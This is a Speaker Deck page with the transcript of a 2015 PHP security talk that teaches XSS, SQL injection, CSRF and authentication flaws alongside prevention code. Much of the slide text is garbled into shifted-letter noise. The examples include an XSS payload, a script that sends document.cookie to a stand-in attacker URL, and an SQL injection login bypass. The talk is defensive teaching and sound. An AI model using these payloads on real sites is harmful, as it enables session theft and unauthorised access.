Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Secure PHP Bootcamp
Search
Chris Cornutt
January 23, 2015
Technology
0
620
Secure PHP Bootcamp
Given at PHP Benelux 2015
Chris Cornutt
January 23, 2015
Tweet
Share
More Decks by Chris Cornutt
See All by Chris Cornutt
Securing Legacy Applications
ccornutt
0
99
Pentesting for Developers
ccornutt
0
110
Securing Legacy Applications - Longhorn PHP 2018
ccornutt
1
150
Pieces of Auth
ccornutt
0
300
Securing Legacy Applications
ccornutt
0
450
Build Security In
ccornutt
0
170
Introduction to Slim 3
ccornutt
0
150
Securing Legacy Applications
ccornutt
0
32
PHP Security, Redfined
ccornutt
0
260
Other Decks in Technology
See All in Technology
とある事業会社にとっての Kaggler の魅力
hakubishin3
7
1.6k
外部カンファレンスで登壇しよう! 〜「強い」エンジニアへの一歩を踏み出す〜
logica0419
4
140
人工衛星開発のための C2A フレームワークとその開発体験
sksat
0
110
次は君だ。~Japan AWS Jr. Champions 受賞までの奇跡~
fukuchiiinu
0
120
The road to green code (with Sonar)
bluehats
0
170
KongによるAPIライフサイクル マネジメント
hashitokyo
1
160
ラブグラフ紹介資料 〜プロダクト解体新書〜 / Lovegraph Product Deck
lovegraph
0
14k
SOLID - Architecture and Architectural Decisions - Devfest Goa 2024
rivuchk
0
160
不要なリソースを自動で定期的に整理する方法 ~Sandboxアカウントのコストを削減しよう!~
amixedcolor
4
240
40代後半で開発エンジニアからクラウドインフラエンジニアにキャリアチェンジし、生き残れる自信がようやく持てた話
iwamot
9
8.2k
本番のトラフィック量でHudiを検証して見えてきた課題
joker1007
2
270
Deep dive into Nuxt Server Components
wattanx
1
1.3k
Featured
See All Featured
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
231
17k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
92
16k
Git: the NoSQL Database
bkeepers
PRO
425
64k
Building an army of robots
kneath
302
42k
Designing Experiences People Love
moore
138
23k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
37
1.8k
Pencils Down: Stop Designing & Start Developing
hursman
119
11k
Build The Right Thing And Hit Your Dates
maggiecrowley
32
2.3k
Become a Pro
speakerdeck
PRO
24
4.9k
Transcript
Secure PHP Development $ISJT$PSOVUU!FOZHNB
https://jetbrains.com
Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT
1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN
IUUQCJUMZPXBTQUPQ
5IFSF`T OPTVDIUIJOH BTTFDVSF
IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO
IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN
None
XSS: Cross Site Scripting
*OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH
Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>
Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);
xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG
Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );
echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU
Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)
}} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH
SQLi: SQL Injection
*OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH
Example $sql = ‘select id from users where username =
“‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X
Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where
username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU
CSRF: Cross Site Request Forgery
VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF TJNQMF SBOEPNJ[FE GPSFBDIGPSN
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> </form>
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>
Auth*: Authentication & Authorization
EJSFDUPCKFDUSFGFSFODF " EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU
QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT
None
None
And…
4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET
5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN